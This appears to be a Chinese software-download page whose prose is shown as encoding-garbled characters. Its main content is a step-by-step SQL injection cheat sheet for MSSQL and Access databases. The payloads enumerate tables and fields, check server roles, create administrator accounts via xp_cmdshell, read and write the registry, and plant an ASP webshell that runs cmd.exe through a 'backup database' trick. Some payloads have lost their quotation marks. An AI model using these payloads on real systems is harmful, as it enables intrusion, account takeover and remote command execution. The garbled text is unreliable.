ÍøÕ¾°²È«¼ì²âÈëÇÖ¹¤¾ß

ÍøÕ¾°²È«¼ì²âÈëÇÖ¹¤¾ß

ÍøÕ¾°²È«¼ì²âÈëÇÖ¹¤¾ß

ÍøÕ¾°²È«¼ì²âÈëÇÖ¹¤¾ß

È˹¤¼ì²â£¬°²ÐÄÏÂÔØ
Èí¼þͶËß
·ÖÀà
ÍøÂ簲ȫ
´óС
1MB
ÓïÑÔ
¼òÌåÖÐÎÄ
Èí¼þÊÚȨ
Ãâ·Ñ
ƽ̨
WinAll
¸üÐÂʱ¼ä
2026-04-10

±¾×¨Óù¤¾ß×÷ÓÃÊ®·ÖÇ¿¾¢£¬ÆÚ´ýѧÉúÃÇÓÃÒÔÕýµÀ£¬±ðÈ¥×öһЩΪ·Ç×÷´õµÄÈÃÈËÊ®·Ö¿É³ÜµÄʶù£¬ÓÉVBÓïÑÔ׫дµÄÍøÖ·ÍøÕ¾Â©¶´É¨ÃèרÓù¤¾ßµÄÃû×Ö£¬ASPÒýÈëÍøÕ¾Â©¶´É¨ÃèרÓù¤¾ß£¬ÓÈÆäÔÚSQL ServerÒýÈë¼ìÑé²ãÃæÓзdz£¸ßµÄ׼ȷ¶È¡£

1.·Ö±æÊDz»ÊÇÓÐÒýÈë

;and 1=1

;and 1=2

2.·ÖÎöÅжÏÊDz»ÊÇmssql

;and user0

3.·Ö±æÊý¾Ý¿âϵͳÈí¼þ

;and (select count(*) from sysobjects)0 mssql

;and (select count(*) from msysobjects)0 Access

4.ÒýÈëÖ÷Òª²ÎÊýÊDZêʶ·û

and [²éѯÌõ¼þ] and =

5.¼ìË÷ʱû¹ýÂÇÖ÷Òª²ÎÊýµÄ

and [²éѯÌõ¼þ] and %=

6.²ÂÊý¾Ý¿â

;and (Select Count(*) from [Êý¾Ý¿âÃû])0

7.²Â×Ö¶Î

;and (Select Count(×Ö¶ÎÃû) from Êý¾Ý¿âÃû)0

8.²Â×Ö¶ÎÖмͼ³¤¶Ì

;and (select top 1 len(×Ö¶ÎÃû) from Êý¾Ý¿âÃû)0

9.(1)²Â×ֶεÄASCIIÖµ£¨access£©

;and (select top 1 asc(mid(×Ö¶ÎÃû,1,1)) from Êý¾Ý¿âÃû)0

(2)²Â×ֶεÄasciiÖµ£¨mssql£©

;and (select top 1 unicode(substring(×Ö¶ÎÃû,1,1)) from Êý¾Ý¿âÃû)0

10.¼ì²â¹ÜÀíȨÏÞ¹¹Ô죨mssql£©

;and 1=(SELECT IS_SRVROLEMEMBER(sysadmin));--

;and 1=(SELECT IS_SRVROLEMEMBER(serveradmin));--

;and 1=(SELECT IS_SRVROLEMEMBER(setupadmin));--

;and 1=(SELECT IS_SRVROLEMEMBER(securityadmin));--

;and 1=(SELECT IS_SRVROLEMEMBER(diskadmin));--

;and 1=(SELECT IS_SRVROLEMEMBER(bulkadmin));--

;and 1=(SELECT IS_MEMBER(db_owner));--

11.¼ÓÉÏmssqlºÍÌåϵµÄÕ˺Å

;exec master.dbo.sp_addlogin username;--

;exec master.dbo.sp_password null,

username,password;--

;exec master.dbo.sp_addsrvrolemember sysadmin

username;--

;exec master.dbo.xp_cmdshell net user username

password /workstations:* /TIMes:all

/passwordchg:yes /passwordreq:yes /active:yes /add

;--

;exec master.dbo.xp_cmdshell net user username

password /add;--

;exec master.dbo.xp_cmdshell net localgroup

administrators username /add;--

12.(1)½âÎöxmlÎļþĿ¼

;create table dirs(paths varchar(100), id int)

;insert dirs exec master.dbo.xp_dirtree c:\

;and (select top 1 paths from dirs)0

;and (select top 1 paths from dirs where paths not

in(Éϲ½»ñµÃµÄpaths)))

(2)½âÎöxmlÎļþĿ¼

;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--

;insert temp exec master.dbo.xp_availablemedia;-- µÃµ½µ±½ñÈ«²¿¿ØÖÆÆ÷

;insert into temp(id) exec master.dbo.xp_subdirs c:\;-- µÃµ½¸ùĿ¼Ŀ¼

;insert into temp(id,num1) exec master.dbo.xp_dirtree c:\;-- µÃµ½È«²¿¸ùĿ¼µÄÎļþĿ¼Ê÷Ðνṹ

;insert into temp(id) exec master.dbo.xp_cmdshell type c:\web\index.asp;-- ²éѯ×ÊÁϵăÈÈÝ

13.mssqlÖеÄsqlÓï¾ä

xp_regenumvalues ×¢²á±íÎļþ¸ù¼ü, ×Ó¼ü

;exec xp_regenumvalues HKEY_LOCAL_MACHINE,

SOFTWARE\Microsoft\windows\CurrentVersion\Run ÒԺü¸¸ö¼Ç¼¼¯·½·¨»Øµ½È«²¿¼üÖµ

xp_regread ¸ù¼ü,×Ó¼ü,¼üÖµÃû

;exec xp_regread HKEY_LOCAL_MACHINE,

SOFTWARE\Microsoft\Windows\CurrentVersion,

CommonFilesDir »Øµ½Öƶ©¼üµÄÖµ

xp_regwrite ¸ù¼ü,×Ó¼ü, ÖµÃû, ÖµÖÖÀà, Öµ

ÖµÖÖÀàÓÐ2ÖÖREG_SZ ±íÃ÷×Ö·ûÐÍ,REG_DWORD ±íÃ÷ÕûÐÎ

;exec xp_regwrite HKEY_LOCAL_MACHINE,

SOFTWARE\Microsoft\Windows\CurrentVersion,

TestValueName,reg_sz,hello ÔØÈë×¢²á±íÎļþ

xp_regdeletevalue ¸ù¼ü,×Ó¼ü,ÖµÃû

exec xp_regdeletevalue HKEY_LOCAL_MACHINE,

SOFTWARE\Microsoft\Windows\CurrentVersion,

TestValueName ɾµôijһֵ

xp_regdeletekey HKEY_LOCAL_MACHINE,

SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey Í˸ñ¼ü,°üº¬¸Ã¼üÏÂÈ«²¿Öµ

14.mssqlµÄbackup½¨Á¢webshell

use model

create table cmd(str image);

insert into cmd(str) values (% Dim oScript %);

backup database model to disk=c:\l.asp;

15.mssqlÄÚǶº­Êý

;and (select @@version)0 µÃµ½WindowsµÄ°æ±¾ÐÅÏ¢

;and user_name()=dbo ·Ö±æµ±½ñϵͳÈí¼þµÄÁª½Ó¿Í»§ÊÇ·ñsa

;and (select user_name())0 ±¬µ±½ñϵͳÈí¼þµÄÁª½Ó¿Í»§

;and (select db_name())0 »ñµÃµ±½ñÁª½ÓµÄÊý¾Ý¿â

16.¼òÔ¼µÄwebshell

use model

create table cmd(str image);

insert into cmd(str) values (%=server.createobject(wscript.shell).exec(cmd.exe /c request(c)).stdout.readall%);

backup database model to disk=g:\wwwtest\l.asp;

ÒªÇóµÄÇé¿öÏ£¬ÏñÕâÑù×ÓÓãº

l.asp?c=dir

Ïà¹Ø×¨Ìâ
Êý¾Ý¿âÈí¼þ 34¿î

¶àÌØÈí¼þרÌâΪÄúÌṩÊý¾Ý¿âÈí¼þ,Ãâ·ÑÊý¾Ý¿âÈí¼þ,Êý¾Ý¿âÈí¼þÅÅÐÐ;°²×¿Æ»¹û°æÈí¼þappÒ»Ó¦¾ãÈ«¡£¶àÌØÈí¼þÕ¾Ö»ÌṩÂÌÉ«¡¢ÎÞ¶¾¡¢ÎÞ²å¼þ¡¢ÎÞľÂíµÄ´¿ÂÌÉ«¹¤¾ßÏÂÔØ

Excel°²×¿°²×¿°æ
Excel°²×¿°²×¿°æ
¸üÐÂÈÕÆÚ£º2026-03-23
°²×¿»ÊµÛ°²×¿°æ
°²×¿»ÊµÛ°²×¿°æ
¸üÐÂÈÕÆÚ£º2026-04-04
°²×¿»ùÕ¾Ëø¶¨Èí¼þ
°²×¿»ùÕ¾Ëø¶¨Èí¼þ
¸üÐÂÈÕÆÚ£º2026-04-03
°²×¿ÊÖ»ú×ÖÌåÈí¼þ
°²×¿ÊÖ»ú×ÖÌåÈí¼þ
¸üÐÂÈÕÆÚ£º2026-04-17
°²×¿ÊÖ»ú±¸·ÝÈí¼þ
°²×¿ÊÖ»ú±¸·ÝÈí¼þ
¸üÐÂÈÕÆÚ£º2026-04-12
Èí¼þÌìÌð²×¿°æ
Èí¼þÌìÌð²×¿°æ
¸üÐÂÈÕÆÚ£º2026-04-12
EGOÈí¼þ°²×¿°æ
EGOÈí¼þ°²×¿°æ
¸üÐÂÈÕÆÚ£º2026-04-11
°²×¿Êý¾Ý»Ö¸´Èí¼þ
°²×¿Êý¾Ý»Ö¸´Èí¼þ
¸üÐÂÈÕÆÚ£º2026-04-09
¼üÅ̼ì²â 27¿î

¼üÅ̼ì²â£¬ÈÕ½¥×·ÇóÍêÃÀ¸ßÖÊÁ¿µÄÊÖ»úÓÎÏ·¹¤×÷ÖÐÈÕ³£Éú»î£¬¿Í»§¶ÔÓ²¼þ»úÆ÷É豸µÄ¹æ¶¨Ò²ÓúÀ´Óú¸ßµçÄԵļüÅÌ¿ÉÒÔ˵ÊÇÀûÓÃÂÊ×î´ó¡¢²ð»»×î¾­³£µÄÓ²¼þ»úÆ÷É豸֮һ£¬¼ÙÈçÌôÑ¡ºÍ²âÊÔ¼üÅÌÒ»°ãÈË»¹ÕæÃ»Ïë¹ý£¬¼üÅ̲âÊÔÊÖ»úÈí¼þÄܾ«È·¼ì²âÄãÌØ¶¨µçÄÔ¼üÅ̵Äÿһ¸ö°´¼üËÙÂÊ£¬±ã½ÝÄãÌôÑ¡ÖÓÒâµÄÐԼ۱ȸߡ£

EVEREST(Ó²¼þ¼ì²â¹¤¾ß)
EVEREST(Ó²¼þ¼ì²â¹¤¾ß)
¸üÐÂÈÕÆÚ£º2026-04-05
Ó²¼þ¼ì²â(HWiNFO32)
Ó²¼þ¼ì²â(HWiNFO32)
¸üÐÂÈÕÆÚ£º2026-04-14
ÊÖ»úÓ²¼þ¼ì²â´óʦÈí¼þ
ÊÖ»úÓ²¼þ¼ì²â´óʦÈí¼þ
¸üÐÂÈÕÆÚ£º2025-11-10
ÌôÑ¡ÑÝÔ±
ÌôÑ¡ÑÝÔ±
¸üÐÂÈÕÆÚ£º2026-03-31
ÀñÎïÌôÑ¡
ÀñÎïÌôÑ¡
¸üÐÂÈÕÆÚ£º2026-04-12
iDevice(ÊÖ»úÓ²¼þ¼ì²â)
iDevice(ÊÖ»úÓ²¼þ¼ì²â)
¸üÐÂÈÕÆÚ£º2026-04-10
Device Info(Ó²¼þ¼ì²â)
Device Info(Ó²¼þ¼ì²â)
¸üÐÂÈÕÆÚ£º2026-04-15
Ó²¼þ¼ì²âר¼Ò
Ó²¼þ¼ì²âר¼Ò
¸üÐÂÈÕÆÚ£º2025-02-19
Ó²¼þ¼ì²âר¼Ò
Ó²¼þ¼ì²âר¼Ò
¸üÐÂÈÕÆÚ£º2026-03-31
Êý¾Ý¿â¹¤¾ß 34¿î

¶àÌØÈí¼þרÌâΪÄúÌṩÊý¾Ý¿â¹¤¾ß,Êý¾Ý¿â²éѯ¹¤¾ß,Êý¾Ý¿âÁ¬½Ó¹¤¾ß;°²×¿Æ»¹û°æÈí¼þappÒ»Ó¦¾ãÈ«¡£¶àÌØÈí¼þÕ¾Ö»ÌṩÂÌÉ«¡¢ÎÞ¶¾¡¢ÎÞ²å¼þ¡¢ÎÞľÂíµÄ´¿ÂÌÉ«¹¤¾ßÏÂÔØ

DBDiff(Êý¾Ý¿â¶Ô±È¹¤¾ß)
DBDiff(Êý¾Ý¿â¶Ô±È¹¤¾ß)
¸üÐÂÈÕÆÚ£º2025-02-19
Scuba(Êý¾Ý¿âɨÃ蹤¾ß)
Scuba(Êý¾Ý¿âɨÃ蹤¾ß)
¸üÐÂÈÕÆÚ£º2025-02-19
Dataedo(Êý¾Ý¿âÎĵµ¹¤¾ß)
Dataedo(Êý¾Ý¿âÎĵµ¹¤¾ß)
¸üÐÂÈÕÆÚ£º2025-02-19
DBSync(Êý¾Ý¿âͬ²½¹¤¾ß)
DBSync(Êý¾Ý¿âͬ²½¹¤¾ß)
¸üÐÂÈÕÆÚ£º2026-04-03
Êý¾Ý¿âͬ²½¹¤¾ß(DBSync)
Êý¾Ý¿âͬ²½¹¤¾ß(DBSync)
¸üÐÂÈÕÆÚ£º2026-04-01
ExcelToSQL²åÈëÊý¾Ý¿â¹¤¾ß
ExcelToSQL²åÈëÊý¾Ý¿â¹¤¾ß
¸üÐÂÈÕÆÚ£º2026-03-28
MysqlCopier(Êý¾Ý¿â¸´Öƹ¤¾ß)
MysqlCopier(Êý¾Ý¿â¸´Öƹ¤¾ß)
¸üÐÂÈÕÆÚ£º2026-04-05
PDMan(Êý¾Ý¿â½¨Ä£¹¤¾ß)
PDMan(Êý¾Ý¿â½¨Ä£¹¤¾ß)
¸üÐÂÈÕÆÚ£º2026-04-05
Êý¾Ý¿â±à¼­¹¤¾ß(SqlLobEditor)
Êý¾Ý¿â±à¼­¹¤¾ß(SqlLobEditor)
¸üÐÂÈÕÆÚ£º2026-04-01
Êý¾Ý¿â¹ÜÀí 36¿î

»¶Ó­·ÃÎÊÎÒÃǵÄÊý¾Ý¿â¹ÜÀíÓ¦Óúϼ¯Ò³Ã棡ÕâÀï»ã¼¯Á˶à¿î¸ßЧ¡¢Ò×ÓõÄÊý¾Ý¿â¹ÜÀí¹¤¾ß£¬º­¸ÇMySQL¡¢PostgreSQL¡¢SQLiteµÈ¶àÖÖÊý¾Ý¿âÀàÐÍ¡£ÎÞÂÛÊdzõѧÕß»¹ÊÇרҵ¿ª·¢Õߣ¬¶¼ÄÜÕÒµ½ÊʺÏ×Ô¼ºµÄÓ¦Óá£ÎÒÃÇÌṩÁ˲»Í¬°æ±¾µÄÈí¼þÏÂÔØ£¬È·±£Âú×ãÄúµÄ¸÷ÖÖÐèÇó¡£Á¢¼´ÏÂÔØ£¬ÌåÑéÁ÷³©µÄÊý¾Ý¿â¹ÜÀí·þÎñ£¬ÌáÉý¹¤×÷ЧÂÊ¡£

Database.NET(¶àÊý¾Ý¿â¹ÜÀí¹¤¾ß)
Database.NET(¶àÊý¾Ý¿â¹ÜÀí¹¤¾ß)
¸üÐÂÈÕÆÚ£º2026-04-09
Database.NET(Êý¾Ý¿â¹ÜÀí¹¤¾ß)
Database.NET(Êý¾Ý¿â¹ÜÀí¹¤¾ß)
¸üÐÂÈÕÆÚ£º2026-03-30
DBeaver 64λ(Êý¾Ý¿â¹ÜÀíÈí¼þ)
DBeaver 64λ(Êý¾Ý¿â¹ÜÀíÈí¼þ)
¸üÐÂÈÕÆÚ£º2025-02-19
DBeaver(ͨÓÃÊý¾Ý¿â¹ÜÀí¹¤¾ß)
DBeaver(ͨÓÃÊý¾Ý¿â¹ÜÀí¹¤¾ß)
¸üÐÂÈÕÆÚ£º2026-04-05
MySQL GUI Tools(¿ÉÊÓ»¯¹ÜÀí)
MySQL GUI Tools(¿ÉÊÓ»¯¹ÜÀí)
¸üÐÂÈÕÆÚ£º2026-04-03
MySQL GUI Tools
MySQL GUI Tools
¸üÐÂÈÕÆÚ£º2025-02-19
Ö÷»ú¼ì²â 34¿î

Ó²¼þ¼ì²â¹¤¾ßÌṩCPU,Ö÷°å,ÏÔ¿¨ÐͺÅ,ÄÚ´æÐͺÅ,Ó²ÅÌÐͺÅ,ÍâÉèµÈµçÄÔÓ²¼þ¼ì²â¹¤¾ßÏÂÔØ

chipgeniusоƬ¼ì²â¹¤¾ß
chipgeniusоƬ¼ì²â¹¤¾ß
¸üÐÂÈÕÆÚ£º2026-04-11
ÍâÉèÌìÏÂ
ÍâÉèÌìÏÂ
¸üÐÂÈÕÆÚ£º2026-04-11
Gpuinfo(ÏÔ¿¨¼ì²âÈí¼þ)
Gpuinfo(ÏÔ¿¨¼ì²âÈí¼þ)
¸üÐÂÈÕÆÚ£º2026-04-04
ÏÔ¿¨¼ì²âÉñÆ÷TechPowerUp
ÏÔ¿¨¼ì²âÉñÆ÷TechPowerUp
¸üÐÂÈÕÆÚ£º2026-04-10
URL¼ì²â¹¤¾ß
URL¼ì²â¹¤¾ß
¸üÐÂÈÕÆÚ£º2025-02-19
ÃÜÔ¿¼ì²â¹¤¾ß
ÃÜÔ¿¼ì²â¹¤¾ß
¸üÐÂÈÕÆÚ£º2025-02-19
¼üÅ̼ì²â¹¤¾ß
¼üÅ̼ì²â¹¤¾ß
¸üÐÂÈÕÆÚ£º2025-02-19
¼üÅ̼ì²â¹¤¾ß
¼üÅ̼ì²â¹¤¾ß
¸üÐÂÈÕÆÚ£º2026-04-10
ÓòÃû¼ì²â¹¤¾ß
ÓòÃû¼ì²â¹¤¾ß
¸üÐÂÈÕÆÚ£º2026-04-06
ÍøÓÑÆÀÂÛ
ÓÑÇéÁ´½Ó
ÎÂܰÌáʾ
ÄúºÃ:
¸ÐлÄúÏÂÔØ±¾Èí¼þ¡£
ÏÖÑûÇëÄú¹Ø×¢ÎÒÃǵÄ΢ÐŹ«Öںš£
Äú½«»ñÈ¡µ½´ËÈí¼þµÄ°²×°Ê¹Óý̳̼°Èí¼þµÄÏà¹Ø¿Î³Ìѧϰ¡£
ÈçÓÐÒÉÎÊÒ²¿ÉÔÚ΢ÐŹ«ÖÚºÅÖлظ´ÎÊÌ⣬½«»áÓÐÈ˹¤¿Í·þΪÄú½â´ð¡£
ºÃµÄ£¬ÎÒÖªµÀÁË